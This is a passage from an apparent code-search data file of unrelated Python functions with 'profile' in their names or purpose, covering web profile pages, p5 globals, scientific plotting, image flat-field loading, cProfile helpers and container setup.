if index:\n try:\n index = int(index)\n except ValueError:\n datalist = \"\"\n else:\n # @ToDo: Check permissions to the Resource & do\n # something different if no permission\n datalist = self._datalist(r, widgets[index], **attr)\n output = {\"item\": datalist}\n\n elif r.representation == \"aadata\":\n # Ajax-update of one datatable\n index = r.get_vars.get(\"update\", None)\n if index:\n try:\n index = int(index)\n except ValueError:\n datalist = \"\"\n else:\n # @ToDo: Check permissions to the Resource & do\n # something different if no permission\n datatable = self._datatable(r, widgets[index], **attr)\n return datatable\n\n else:\n # Default page-load\n\n # Page Title\n title = get_config(tablename, \"profile_title\")\n if not title:\n try:\n title = r.record.name\n except:\n title = current.T(\"Profile Page\")\n elif callable(title):\n title = title(r)\n\n # Page Header\n if not header:\n header = H2(title, _class=\"profile-header\")\n elif callable(header):\n header = header(r)\n\n output = {\"title\": title,\n \"header\": header,\n }\n\n # Update Form, if configured\n update = get_config(tablename, \"profile_update\")\n if update:\n editable = get_config(tablename, \"editable\", True)\n authorised = self._permitted(method=\"update\")\n if authorised and editable:\n show = get_crud_string(tablename, \"title_update\")\n hide = current.T(\"Hide Form\")\n form = self.update(r, **attr)[\"form\"]\n else:\n show = get_crud_string(tablename, \"title_display\")\n hide = current.T(\"Hide Details\")\n form = self.read(r, **attr)[\"item\"]\n\n if update == \"visible\":\n hidden = False\n label = hide\n style_hide, style_show = None, \"display:none\"\n else:\n hidden = True\n label = show\n style_hide, style_show = \"display:none\", None\n\n toggle = A(SPAN(label,\n data = {\"on\": show,\n \"off\": hide,\n },\n ),\n ICON(\"down\", _style=style_show),\n ICON(\"up\", _style=style_hide),\n data = {\"hidden\": hidden},\n _class = \"form-toggle action-lnk\",\n )\n form.update(_style=style_hide)\n output[\"form\"] = DIV(toggle,\n form,\n _class = \"profile-update\",\n )\n else:\n output[\"form\"] = \"\"\n\n # Widgets\n response = current.response\n rows = []\n append = rows.append\n row = None\n cols = get_config(tablename, \"profile_cols\")\n if not cols:\n cols = 2\n row_cols = 0\n for widget in widgets:\n\n # Render the widget\n w_type = widget[\"type\"]\n if w_type == \"comments\":\n w = self._comments(r, widget, **attr)\n elif w_type == \"datalist\":\n w = self._datalist(r, widget, **attr)\n elif w_type == \"datatable\":\n w = self._datatable(r, widget, **attr)\n elif w_type == \"form\":\n w = self._form(r, widget, **attr)\n elif w_type == \"map\":\n w = self._map(r, widget, widgets, **attr)\n elif w_type == \"report\":\n w = self._report(r, widget, **attr)\n elif w_type == \"organizer\":\n w = self._organizer(r, widget, **attr)\n elif w_type == \"custom\":\n w = self._custom(r, widget, **attr)\n else:\n if response.s3.debug:\n raise SyntaxError(\"Unsupported widget type %s\" %\n w_type)\n else:\n # ignore\n continue\n\n if row is None:\n # Start new row\n row = DIV(_class=\"row profile\")\n row_cols = 0\n\n # Append widget to row\n row.append(w)\n colspan = widget.get(\"colspan\", 1)\n row_cols += colspan\n if row_cols == cols:\n # Close this row\n append(row)\n row = None\n\n if row:\n # We have an incomplete row of widgets\n append(row)\n output[\"rows\"] = rows\n\n # Activate this if a project needs it\n #response.view = get_config(tablename, \"profile_view\") or \\\n # self._view(r, \"profile.html\")\n response.view = self._view(r, \"profile.html\")\n\n return output", "def pre_draw(p5_instance, draw_func):\n global _CTX_MIDDLE, _DEFAULT_FILL, _DEFAULT_LEADMULT, _DEFAULT_STROKE, _DEFAULT_TEXT_FILL\n\n global ADD, ALT, ARROW, AUTO, AUDIO, AXES, BACKSPACE, BASELINE, BEVEL, BEZIER, BLEND, BLUR, BOLD, BOLDITALIC\n global BOTTOM, BURN, CENTER, CHORD, CLAMP, CLOSE, CONTROL, CORNER, CORNERS, CROSS, CURVE, DARKEST\n global DEG_TO_RAD, DEGREES, DELETE, DIFFERENCE, DILATE, DODGE, DOWN_ARROW, ENTER, ERODE, ESCAPE, EXCLUSION\n global FILL, GRAY, GRID, HALF_PI, HAND, HARD_LIGHT, HSB, HSL, IMAGE, IMMEDIATE, INVERT, ITALIC, LANDSCAPE\n global LEFT, LEFT_ARROW, LIGHTEST, LINE_LOOP, LINE_STRIP, LINEAR, LINES, MIRROR, MITER, MOVE, MULTIPLY, NEAREST\n global NORMAL, OPAQUE, OPEN, OPTION, OVERLAY, P2D, PI, PIE, POINTS, PORTRAIT, POSTERIZE, PROJECT, QUAD_STRIP, QUADRATIC\n global QUADS, QUARTER_PI, RAD_TO_DEG, RADIANS, RADIUS, REPEAT, REPLACE, RETURN, RGB, RIGHT, RIGHT_ARROW\n global ROUND, SCREEN, SHIFT, SOFT_LIGHT, SQUARE, STROKE, SUBTRACT, TAB, TAU, TEXT, TEXTURE, THRESHOLD, TOP\n global TRIANGLE_FAN, TRIANGLE_STRIP, TRIANGLES, TWO_PI, UP_ARROW, VIDEO, WAIT, WEBGL\n\n global frameCount, focused, displayWidth, displayHeight, windowWidth, windowHeight, width, height\n global disableFriendlyErrors, deviceOrientation, accelerationX, accelerationY, accelerationZ\n global pAccelerationX, pAccelerationY, pAccelerationZ, rotationX, rotationY, rotationZ\n global pRotationX, pRotationY, pRotationZ, turnAxis, keyIsPressed, key, keyCode, mouseX, mouseY, pmouseX, pmouseY\n global winMouseX, winMouseY, pwinMouseX, pwinMouseY, mouseButton, mouseIsPressed, touches, pixels\n\n _CTX_MIDDLE = p5_instance._CTX_MIDDLE\n _DEFAULT_FILL = p5_instance._DEFAULT_FILL\n _DEFAULT_LEADMULT = p5_instance._DEFAULT_LEADMULT\n _DEFAULT_STROKE = p5_instance._DEFAULT_STROKE\n _DEFAULT_TEXT_FILL = p5_instance._DEFAULT_TEXT_FILL\n\n ADD = p5_instance.ADD\n ALT = p5_instance.ALT\n ARROW = p5_instance.ARROW\n AUDIO = p5_instance.AUDIO\n AUTO = p5_instance.AUTO\n AXES = p5_instance.AXES\n BACKSPACE = p5_instance.BACKSPACE\n BASELINE = p5_instance.BASELINE\n BEVEL = p5_instance.BEVEL\n BEZIER = p5_instance.BEZIER\n BLEND = p5_instance.BLEND\n BLUR = p5_instance.BLUR\n BOLD = p5_instance.BOLD\n BOLDITALIC = p5_instance.BOLDITALIC\n BOTTOM = p5_instance.BOTTOM\n BURN = p5_instance.BURN\n CENTER = p5_instance.CENTER\n CHORD = p5_instance.CHORD\n CLAMP = p5_instance.CLAMP\n CLOSE = p5_instance.CLOSE\n CONTROL = p5_instance.CONTROL\n CORNER = p5_instance.CORNER\n CORNERS = p5_instance.CORNERS\n CROSS = p5_instance.CROSS\n CURVE = p5_instance.CURVE\n DARKEST = p5_instance.DARKEST\n DEG_TO_RAD = p5_instance.DEG_TO_RAD\n DEGREES = p5_instance.DEGREES\n DELETE = p5_instance.DELETE\n DIFFERENCE = p5_instance.DIFFERENCE\n DILATE = p5_instance.DILATE\n DODGE = p5_instance.DODGE\n DOWN_ARROW = p5_instance.DOWN_ARROW\n ENTER = p5_instance.ENTER\n ERODE = p5_instance.ERODE\n ESCAPE = p5_instance.ESCAPE\n EXCLUSION = p5_instance.EXCLUSION\n FILL = p5_instance.FILL\n GRAY = p5_instance.GRAY\n GRID = p5_instance.GRID\n HALF_PI = p5_instance.HALF_PI\n HAND = p5_instance.HAND\n HARD_LIGHT = p5_instance.HARD_LIGHT\n HSB = p5_instance.HSB\n HSL = p5_instance.HSL\n IMAGE = p5_instance.IMAGE\n IMMEDIATE = p5_instance.IMMEDIATE\n INVERT = p5_instance.INVERT\n ITALIC = p5_instance.ITALIC\n LANDSCAPE = p5_instance.LANDSCAPE\n LEFT = p5_instance.LEFT\n LEFT_ARROW = p5_instance.LEFT_ARROW\n LIGHTEST = p5_instance.LIGHTEST\n LINE_LOOP = p5_instance.LINE_LOOP\n LINE_STRIP = p5_instance.LINE_STRIP\n LINEAR = p5_instance.LINEAR\n LINES = p5_instance.LINES\n MIRROR = p5_instance.MIRROR\n MITER = p5_instance.MITER\n MOVE = p5_instance.MOVE\n MULTIPLY = p5_instance.MULTIPLY\n NEAREST = p5_instance.NEAREST\n NORMAL = p5_instance.NORMAL\n OPAQUE = p5_instance.OPAQUE\n OPEN = p5_instance.OPEN\n OPTION = p5_instance.OPTION\n OVERLAY = p5_instance.OVERLAY\n P2D = p5_instance.P2D\n P3D = p5_instance.WEBGL\n PI = p5_instance.PI\n PIE = p5_instance.PIE\n POINTS = p5_instance.POINTS\n PORTRAIT = p5_instance.PORTRAIT\n POSTERIZE = p5_instance.POSTERIZE\n PROJECT = p5_instance.PROJECT\n QUAD_STRIP = p5_instance.QUAD_STRIP\n QUADRATIC = p5_instance.QUADRATIC\n QUADS = p5_instance.QUADS\n QUARTER_PI = p5_instance.QUARTER_PI\n RAD_TO_DEG = p5_instance.RAD_TO_DEG\n RADIANS = p5_instance.RADIANS\n RADIUS = p5_instance.RADIUS\n REPEAT = p5_instance.REPEAT\n REPLACE = p5_instance.REPLACE\n RETURN = p5_instance.RETURN\n RGB = p5_instance.RGB\n RIGHT = p5_instance.RIGHT\n RIGHT_ARROW = p5_instance.RIGHT_ARROW\n ROUND = p5_instance.ROUND\n SCREEN = p5_instance.SCREEN\n SHIFT = p5_instance.SHIFT\n SOFT_LIGHT = p5_instance.SOFT_LIGHT\n SQUARE = p5_instance.SQUARE\n STROKE = p5_instance.STROKE\n SUBTRACT = p5_instance.SUBTRACT\n TAB = p5_instance.TAB\n TAU = p5_instance.TAU\n TEXT = p5_instance.TEXT\n TEXTURE = p5_instance.TEXTURE\n THRESHOLD = p5_instance.THRESHOLD\n TOP = p5_instance.TOP\n TRIANGLE_FAN = p5_instance.TRIANGLE_FAN\n TRIANGLE_STRIP = p5_instance.TRIANGLE_STRIP\n TRIANGLES = p5_instance.TRIANGLES\n TWO_PI = p5_instance.TWO_PI\n UP_ARROW = p5_instance.UP_ARROW\n VIDEO = p5_instance.VIDEO\n WAIT = p5_instance.WAIT\n WEBGL = p5_instance.WEBGL\n\n frameCount = p5_instance.frameCount\n focused = p5_instance.focused\n displayWidth = p5_instance.displayWidth\n displayHeight = p5_instance.displayHeight\n windowWidth = p5_instance.windowWidth\n windowHeight = p5_instance.windowHeight\n width = p5_instance.width\n height = p5_instance.height\n disableFriendlyErrors = p5_instance.disableFriendlyErrors\n deviceOrientation = p5_instance.deviceOrientation\n accelerationX = p5_instance.accelerationX\n accelerationY = p5_instance.accelerationY\n accelerationZ = p5_instance.accelerationZ\n pAccelerationX = p5_instance.pAccelerationX\n pAccelerationY = p5_instance.pAccelerationY\n pAccelerationZ = p5_instance.pAccelerationZ\n rotationX = p5_instance.rotationX\n rotationY = p5_instance.rotationY\n rotationZ = p5_instance.rotationZ\n pRotationX = p5_instance.pRotationX\n pRotationY = p5_instance.pRotationY\n pRotationZ = p5_instance.pRotationZ\n turnAxis = p5_instance.turnAxis\n keyIsPressed = p5_instance.keyIsPressed\n key = p5_instance.key\n keyCode = p5_instance.keyCode\n mouseX = p5_instance.mouseX\n mouseY = p5_instance.mouseY\n pmouseX = p5_instance.pmouseX\n pmouseY = p5_instance.pmouseY\n winMouseX = p5_instance.winMouseX\n winMouseY = p5_instance.winMouseY\n pwinMouseX = p5_instance.pwinMouseX\n pwinMouseY = p5_instance.pwinMouseY\n mouseButton = p5_instance.mouseButton\n mouseIsPressed = p5_instance.mouseIsPressed\n touches = p5_instance.touches\n pixels = p5_instance.pixels\n\n return draw_func()", "def plot_profiles(snap, profs, dust_species_to_plot, debug=False):\n print('Plotting profiles...')\n\n units = {\n 'position': 'au',\n 'gas_velocity_radial_analytical': 'dimensionless',\n 'dust_velocity_radial_analytical': 'dimensionless',\n 'velocity_radial_numerical': 'dimensionless',\n }\n p = profs['gas'][0]\n\n if debug:\n num_dust = snap.num_dust_species\n ax = p.plot(x='radius', y=['velocity_pressure', 'velocity_visc'], units=units)\n y = ['gas_velocity_radial']\n y += [f'dust_velocity_radial_{idx+1:03}' for idx in range(num_dust)]\n ax = p.plot(x='radius', y=y, units=units)\n ax.legend().remove()\n\n fig, ax = plt.subplots()\n\n # Plot \"analytical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='gas_velocity_radial_analytical',\n units=units,\n color='black',\n label='',\n ax=ax,\n )\n y = [f'dust_velocity_radial_analytical_{idx+1:03}' for idx in dust_species_to_plot]\n p.plot(x='radius', y=y, units=units, label='', ax=ax)\n colors = [line.get_color() for line in ax.lines[1:]]\n\n # Plot \"numerical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color='black',\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label='gas',\n std='shading',\n ax=ax,\n )\n profs_to_plot = [\n prof for idx, prof in enumerate(profs['dust']) if idx in dust_species_to_plot\n ]\n for species, prof, color in zip(dust_species_to_plot, profs_to_plot, colors):\n label = f'{snap.properties[\"grain_size\"][species].to(\"cm\"):.1f~P}'\n prof.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color=color,\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label=label,\n std='shading',\n ax=ax,\n )\n\n ax.set_ylabel(r'$v_R / |v_P|$')\n ax.grid()\n\n textstr = f't = {snap.properties[\"time\"].to(\"years\").m:.0f} years'\n bbox = dict(boxstyle='round', facecolor='white', edgecolor='grey', alpha=0.8)\n ax.text(\n 0.97,\n 0.97,\n textstr,\n transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='top',\n bbox=bbox,\n )\n ax.legend(framealpha=0.8, edgecolor='grey')\n\n return ax", "def _load_single_profile(self, path, num_channels, img_size, profile_type):\n assert profile_type in ('dark', 'flat'), \"profile_type must be either 'dark' or 'flat'.\"\n if path is None:\n profile_shape = (num_channels, 1, 1)\n return (\n np.zeros(profile_shape)\n if profile_type == 'dark'\n else np.ones(profile_shape)\n )\n\n expected_ndim = 2 if num_channels == 1 else 3\n profile = skimage.io.imread(path)\n if profile.ndim != expected_ndim:\n raise ValueError(\n 'Expect dimensionality is {} for {}-field profile but {} has {} dimensions.'.format(\n expected_ndim, profile_type, path, profile.ndim\n )\n )\n\n profile = np.atleast_3d(profile)\n # skimage.io.imread convert images with 3 and 4 channels into (Y, X, C) shape,\n # but as (C, Y, X) for images with other channel numbers. We normalize\n # image-shape to (C, Y, X) regardless of the number of channels in the image.\n if num_channels in (1, 3, 4):\n profile = np.moveaxis(profile, 2, 0)\n if profile.shape != (num_channels,) + img_size:\n raise ValueError(\n '{}-field profile shape {} does not match target image shape {}.'.format(\n profile_type.capitalize(), profile.shape, img_size\n )\n )\n\n if self.barrel_correction:\n cval = 0 if profile_type == \"dark\" else 1\n for cimg in profile:\n cimg[:] = transform.barrel_correction(\n cimg, self.barrel_correction, cval=cval\n )\n\n return profile", "def draw(self, offset=geo.zero2d()):\n self._draw_bar(self._get_active_color(), self.inactive_color, offset)\n console.set_default_color_fg(self.text_color)\n self._draw_numbers(offset)", "def cprofiler(fun, *args, **kwargs):\n print(f\"Profiling {fun.__name__}\")\n with cProfile.Profile() as pr:\n fun(*args, **kwargs)\n pr.print_stats()", "def artUserPaintCtx(*args, accopacity: bool=False, activeListChangedProc: Union[AnyStr,\n bool]=\"\", afterStrokeCmd: Union[AnyStr, bool]=\"\", alphaclamp: Union[AnyStr,\n bool]=\"none\", alphaclamplower: Union[float, bool]=0.0, alphaclampupper:\n Union[float, bool]=1.0, attrSelected: Union[AnyStr, bool]=\"\",\n beforeStrokeCmd: Union[AnyStr, bool]=\"\", brushalignment: bool=True,\n brushfeedback: bool=True, chunkCommand: Union[AnyStr, bool]=\"\", clamp:\n Union[AnyStr, bool]=\"none\", clamplower: Union[float, bool]=0.0, clampupper:\n Union[float, bool]=1.0, clear: bool=True, colorAlphaValue: Union[float,\n bool]=0.0, colorRGBAValue: Union[List[float, float, float, float],\n bool]=None, colorRGBValue: Union[List[float, float, float], bool]=None,\n colorRamp: Union[AnyStr, bool]=\"\", colorfeedback: bool=False,\n colorfeedbackOverride: bool=False, colorrangelower: Union[float, bool]=0.0,\n colorrangeupper: Union[float, bool]=1.0, dataTypeIndex: Union[int, bool]=0,\n disablelighting: bool=False, dragSlider: AnyStr=\"\", duringStrokeCmd:\n Union[AnyStr, bool]=\"\", dynclonemode: bool=True, exists: bool=True,\n expandfilename: bool=True, exportaspectratio: Union[float, bool]=0.0,\n exportfilemode: Union[AnyStr, bool]=\"luminance/rgb\", exportfilesave:\n AnyStr=\"\", exportfilesizex: Union[int, bool]=0, exportfilesizey: Union[int,\n bool]=0, exportfiletype: Union[AnyStr, bool]=\"\", filterNodes: bool=True,\n finalizeCmd: Union[AnyStr, bool]=\"\", fullpaths: bool=False,\n getArrayAttrCommand: Union[AnyStr, bool]=\"\", getSurfaceCommand:\n Union[AnyStr, bool]=\"\", getValueCommand: Union[AnyStr, bool]=\"\", history:\n bool=True, image1: Union[AnyStr, bool]=\"\", image2: Union[AnyStr, bool]=\"\",\n image3: Union[AnyStr, bool]=\"\", importfileload: AnyStr=\"\", importfilemode:\n Union[AnyStr, bool]=\"alpha\", importreassign: bool=False, initializeCmd:\n Union[AnyStr, bool]=\"\", interactiveUpdate: bool=True, lastRecorderCmd:\n Union[AnyStr, bool]=\"\", lastStampName: Union[AnyStr, bool]=\"\", lowerradius:\n Union[float, bool]=0.0, makeStroke: Union[int, List[int], bool]=0,\n mappressure: Union[AnyStr, bool]=\"none\", maxvalue: Union[float, bool]=1.0,\n minvalue: Union[float, bool]=0.0, name: AnyStr=\"\", objattrArray:\n Union[AnyStr, bool]=\"\", opacity: Union[float, bool]=1.0, outline: bool=True,\n outwhilepaint: bool=False, paintNodeArray: Union[AnyStr, bool]=\"\",\n paintattrselected: AnyStr=\"\", paintmode: Union[AnyStr, bool]=\"screen\",\n paintoperationtype: Union[AnyStr, bool]=\"Paint\", pickColor: bool=True,\n pickValue: bool=True, playbackCursor: Union[List[float, float],\n List[List[float, float]], bool]=None, playbackPressure: Union[float,\n List[float], bool]=0.0, preserveclonesource: bool=True, profileShapeFile:\n Union[AnyStr, bool]=\"\", projective: bool=False, radius: Union[float,\n bool]=1.0, rampMaxColor: Union[List[float, float, float], bool]=None,\n rampMinColor: Union[List[float, float, float], bool]=None, record:\n bool=True, reflection: bool=False, reflectionaboutorigin: bool=True,\n reflectionaxis: Union[AnyStr, bool]=\"x\", screenRadius: Union[float,\n bool]=0.0, selectclonesource: bool=True, selectedattroper: Union[AnyStr,\n bool]=\"absolute\", setArrayValueCommand: Union[AnyStr, bool]=\"\",\n setValueCommand: Union[AnyStr, bool]=\"\", showactive: bool=True, stampDepth:\n Union[float, bool]=0.0, stampProfile: Union[AnyStr, bool]=\"\", stampSpacing:\n Union[float, bool]=1.0, strokesmooth: Union[AnyStr, bool]=\"\",\n surfaceConformedBrushVertices: bool=True, tablet: bool=True,\n tangentOutline: bool=True, toolCleanupCmd: Union[AnyStr, bool]=\"\",\n toolOffProc: Union[AnyStr, bool]=\"\", toolOnProc: Union[AnyStr, bool]=\"\",\n toolSetupCmd: Union[AnyStr, bool]=\"\", useColorRamp: bool=True,\n useMaxMinColor: bool=True, usepressure: bool=False, value: Union[float,\n bool]=0.0, whichTool: Union[AnyStr, bool]=\"\", worldRadius: Union[float,\n bool]=0.0, q=True, query=True, e=True, edit=True, **kwargs)->Union[AnyStr,\n Any]:\n pass", "def getprofile(self, *args, **kwargs):\n return _image.image_getprofile(self, *args, **kwargs)", "def profile(points, flat_file, num_points=100, scan_dir=0):\n length = 0\n for p in range(len(points) - 1):\n length += np.sqrt((points[p + 1, 0] - points[p, 0]) ** 2 + (points[p + 1, 1] - points[p, 0]) ** 2)\n\n x_len = len(flat_file[scan_dir].data[0])\n y_len = len(flat_file[scan_dir].data)\n\n for point in range(len(points)):\n points[point][0] = nm2pnt(points[point][0], flat_file, axis='x')\n points[point][1] = nm2pnt(points[point][1], flat_file, axis='y')\n if points[point][0] >= x_len:\n points[point][0] = x_len - 1\n if points[point][1] >= y_len:\n points[point][1] = y_len - 1\n\n def line(coords, flat_file):\n\n x0, y0 = coords[0]\n x1, y1 = coords[1]\n num = num_points\n x, y = np.linspace(x0, x1, num), np.linspace(y0, y1, num)\n\n zi = flat_file[scan_dir].data[y.astype(np.int), x.astype(np.int)]\n\n return zi\n\n profile_data = np.array([])\n for pair in range(len(points) - 1):\n profile_data = np.append(profile_data, line([points[pair], points[pair + 1]], flat_file))\n\n return profile_data, length", "async def profile(self, ctx:utils.Context):\n\n pass", "def _AddAttenProbsImageSummary(self, name, atten_probs):\n\n def PlotAttention(fig, axes, cur_atten_probs, title):\n plot.AddImage(fig, axes, cur_atten_probs, title=title)\n axes.set_ylabel(plot.ToUnicode('Output sequence index'), wrap=True)\n axes.set_xlabel(plot.ToUnicode('Input sequence index'), wrap=True)\n\n with plot.MatplotlibFigureSummary(\n name + '/atten_example',\n figsize=(10, 10),\n max_outputs=1,\n subplot_grid_shape=(1, 1)) as fig:\n # Extract first entry in batch of attention prob matrices\n # [tgt_len, src_len]\n fig.AddSubplot([atten_probs], PlotAttention, title='atten_probs')", "def log_transform_features_customer(profile):\n\n view_amount_features = ['max_duration_view_profile', 'view_rate_profile', 'max_amount', \\\n 'min_duration_view_profile', 'min_amount',\\\n 'avg_amount', 'avg_trx_cnt', 'avg_duration_view_profile']\n\n profile_transformed = np.log(profile[view_amount_features]+1)\n\n profile = pd.concat([profile[['gender', 'age', 'became_member_on', 'income']]\\\n \t,profile_transformed], axis=1)\n\n profile.drop(columns=['income', 'min_amount', 'avg_amount', 'avg_duration_view_profile']\\\n \t, inplace=True)\n\n u.save_dataframe_to_sql(profile, 'profile')\n\n return profile", "def live_profile(script, argv, timer, interval, spawn, signum,\n pickle_protocol, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n parent_sock, child_sock = socket.socketpair()\n pid = os.fork()\n if pid == 0:\n # child\n devnull = os.open(os.devnull, os.O_RDWR)\n for f in [sys.stdin, sys.stdout, sys.stderr]:\n os.dup2(devnull, f.fileno())\n frame = sys._getframe()\n profiler = BackgroundProfiler(timer, frame, code, signum)\n profiler.prepare()\n server_args = (interval, noop, pickle_protocol)\n server = SelectProfilingServer(None, profiler, *server_args)\n server.clients.add(child_sock)\n spawn(server.connected, child_sock)\n try:\n exec_(code, globals_)\n finally:\n child_sock.close()\n else:\n # parent\n viewer, loop = make_viewer(mono)\n title = get_title(filename)\n client = ProfilingClient(viewer, loop.event_loop, parent_sock, title)\n client.start()\n try:\n loop.run()\n except KeyboardInterrupt:\n pass\n finally:\n parent_sock.close()\n os.kill(pid, signal.SIGINT)", "def profile(func):\n def wrapper(*args, **kwargs):\n profile_filename = func.__name__ + '.prof'\n profiler = cProfile.Profile()\n result = profiler.runcall(func, *args, **kwargs)\n profiler.dump_stats(profile_filename)\n return result\n return wrapper", "def _get_base(**kwargs):\n profile = get_container_profile(copy.deepcopy(kwargs.get(\"profile\")))\n kw_overrides = copy.deepcopy(kwargs)\n\n def select(key, default=None):\n kw_overrides_match = kw_overrides.pop(key, _marker)\n profile_match = profile.pop(key, default)\n # let kwarg overrides be the preferred choice\n if kw_overrides_match is _marker:\n return profile_match\n return kw_overrides_match\n\n template = select(\"template\")\n image = select(\"image\")\n vgname = select(\"vgname\")\n path = kwargs.get(\"path\", None)\n # remove the above three variables from kwargs, if they exist, to avoid\n # duplicates if create() is invoked below.\n for param in (\"path\", \"image\", \"vgname\", \"template\"):\n kwargs.pop(param, None)\n\n if image:\n proto = urllib.parse.urlparse(image).scheme\n img_tar = __salt__[\"cp.cache_file\"](image)\n img_name = os.path.basename(img_tar)\n hash_ = salt.utils.hashutils.get_hash(\n img_tar, __salt__[\"config.get\"](\"hash_type\")\n )\n name = f\"__base_{proto}_{img_name}_{hash_}\"\n if not exists(name, path=path):\n create(\n name, template=template, image=image, path=path, vgname=vgname, **kwargs\n )\n if vgname:\n rootfs = os.path.join(\"/dev\", vgname, name)\n edit_conf(\n info(name, path=path)[\"config\"],\n out_format=\"commented\",\n **{\"lxc.rootfs\": rootfs},\n )\n return name\n elif template:\n name = f\"__base_{template}\"\n if not exists(name, path=path):\n create(\n name, template=template, image=image, path=path, vgname=vgname, **kwargs\n )\n if vgname:\n rootfs = os.path.join(\"/dev\", vgname, name)\n edit_conf(\n info(name, path=path)[\"config\"],\n out_format=\"commented\",\n **{\"lxc.rootfs\": rootfs},\n )\n return name\n return \"\"", "def plot(cp_profile, *args, destination=\"browser\",\n show_profiles=True, show_observations=True, show_residuals=False, show_rugs=False,\n aggregate_profiles=None, selected_variables=None,\n color=None, size=2, alpha=0.4,\n color_pdps=None, size_pdps=None, alpha_pdps=None,\n color_points=None, size_points=None, alpha_points=None,\n color_residuals=None, size_residuals=None, alpha_residuals=None,\n height=500, width=600,\n plot_title='', yaxis_title='y',\n print_observations=True,\n **kwargs):\n\n params = dict()\n params.update(kwargs)\n params[\"variables\"] = _calculate_plot_variables(cp_profile, selected_variables)\n params['color'] = \"_label_\" if args else color\n params['show_profiles'] = show_profiles\n params['show_observations'] = show_observations\n params['show_rugs'] = show_rugs\n params['show_residuals'] = show_residuals and (cp_profile.new_observation_true is not None)\n params['add_table'] = print_observations\n params['height'] = height\n params['width'] = width\n params['plot_title'] = plot_title\n params['size_ices'] = size\n params['alpha_ices'] = alpha\n params = _params_update(params,\n color_pdps=color_pdps, size_pdps=size_pdps, alpha_pdps=alpha_pdps,\n size_points=size_points, alpha_points=alpha_points, color_points=color_points,\n size_residuals=size_residuals, alpha_residuals=alpha_residuals,\n color_residuals=color_residuals,\n yaxis_title=yaxis_title)\n\n if aggregate_profiles in {'mean', 'median', None}:\n params['aggregate_profiles'] = aggregate_profiles\n else:\n logging.warning(\"Incorrect function for profile aggregation: {}. Parameter ignored.\"\n \"Available values are: 'mean' and 'median'\".format(aggregate_profiles))\n params['aggregate_profiles'] = None\n\n all_profiles = [cp_profile] + list(args)\n\n plot_id = str(next(_PLOT_NUMBER))\n plot_path, params_path, obs_path, profile_path = _get_data_paths(plot_id)\n\n with open(params_path, 'w') as f:\n f.write(\"params = \" + json.dumps(params, indent=2) + \";\")\n\n save_observations(all_profiles, obs_path)\n save_profiles(all_profiles, profile_path)\n\n with app.app_context():\n data = render_template(\"plot_template.html\", i=plot_id, params=params)\n\n with open(plot_path, 'w') as f:\n f.write(data)\n\n destination = _detect_plot_destination(destination)\n if destination == \"notebook\":\n from IPython.display import IFrame, display\n display(IFrame(plot_path, width=int(width * 1.1), height=int(height * 1.1)))\n else:\n # open plot in a browser\n if sys.platform == \"darwin\": # check if on OSX\n plot_path = \"file://\" + os.path.abspath(plot_path)\n webbrowser.open(plot_path)", "def apply_double_profile(plotDict, args=None):\n\tif not 'prof' in plotDict['tree_draw_options'] or 'profs' in plotDict['tree_draw_options']:\n\t\tif isinstance(plotDict['tree_draw_options'], basestring):\n\t\t\tplotDict['tree_draw_options'] = [plotDict['tree_draw_options']]\n\t\tplotDict['tree_draw_options'].append('prof')\n\t# Parameter List Expansion\n\t# the x vs x profile must be an exakt match of y vs x\n\t# we thus must replicate all settings for their position to match\n\t# settings we need to replicate in a controlled fashion\n\tinput_root_opts = ['nicks', 'x_expressions', 'y_expressions', 'z_expressions', 'x_bins', 'y_bins', 'z_bins', 'scale_factors', 'files', 'directories', 'folders', 'weights', 'friend_trees', 'tree_draw_options']\n\t\n\tif not plotDict.get('files'):\n\t\tplotDict['files'] = get_input_files(args)[0]\n\t# make sure all n-length (non-0,1) objects have the same size\n\topt_n_length_max = max(len(plotDict.get(opt_name, ())) for opt_name in input_root_opts if not isinstance(plotDict.get(opt_name), str))\n\tassert opt_n_length_max > 0, 'Cannot expand empty plot definition'\n\tfor opt_name in input_root_opts:\n\t\tif opt_name not in plotDict or isinstance(plotDict[opt_name], str):\n\t\t\tcontinue\n\t\tassert len(plotDict[opt_name]) <= 1 or len(plotDict[opt_name]) == opt_n_length_max, \"Replication requires all input_root options to be either of 0, 1 or same max length ('%s' is %d/%d)\" % (opt_name, len(plotDict[opt_name]), opt_n_length_max)\n\t\t# TODO: dunno if checking for None is required, saw this in HP - MF@20151130\n\t\tif not plotDict[opt_name] or plotDict[opt_name][0] is None:\n\t\t\tcontinue\n\t\tif len(plotDict[opt_name]) == 1:\n\t\t\tplotDict[opt_name] = plotDict[opt_name] * opt_n_length_max\n\t\t# never modify inplace - input may be mutable and used elsewhere/recursively\n\t\tplotDict[opt_name] = plotDict[opt_name][:] * 2\n\tif not plotDict.get('nicks') or plotDict['nicks'][0] is None:\n\t\tplotDict['nicks'] = [\"nick%d\" % nick for nick in xrange(len(plotDict['y_expressions']))]\n\t# X-Y Profile matching\n\t# explicitly create new x profiles\n\tplotDict['y_expressions'] = plotDict['y_expressions'][:opt_n_length_max] + plotDict['x_expressions'][opt_n_length_max:]\n\tplotDict['nicks'] = plotDict['nicks'][opt_n_length_max:] + ['%s_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# create new y vs <x> graphs\n\tplotDict['analysis_modules'] = plotDict.get('analysis_modules', [])[:]\n\tplotDict['analysis_modules'].insert(0, 'TGraphFromHistograms')\n\tplotDict['tgraph_strip_empty'] = 'any'\n\tplotDict['tgraph_y_nicks'] = plotDict['nicks'][:opt_n_length_max]\n\tplotDict['tgraph_x_nicks'] = plotDict['nicks'][opt_n_length_max:]\n\tplotDict['tgraph_result_nicks'] = ['%s_vs_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# disable source plots\n\tplotDict['nicks_blacklist'] = [r'^%s$' % nick for nick in plotDict['nicks']]\n\treturn plotDict", "def profile(x):\n return x", "def _atexit_print_fn():\r\n to_sum = []\r\n for ps in _atexit_print_list:\r\n if ps.fct_callcount or ps.compile_time > 0:\r\n ps.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n 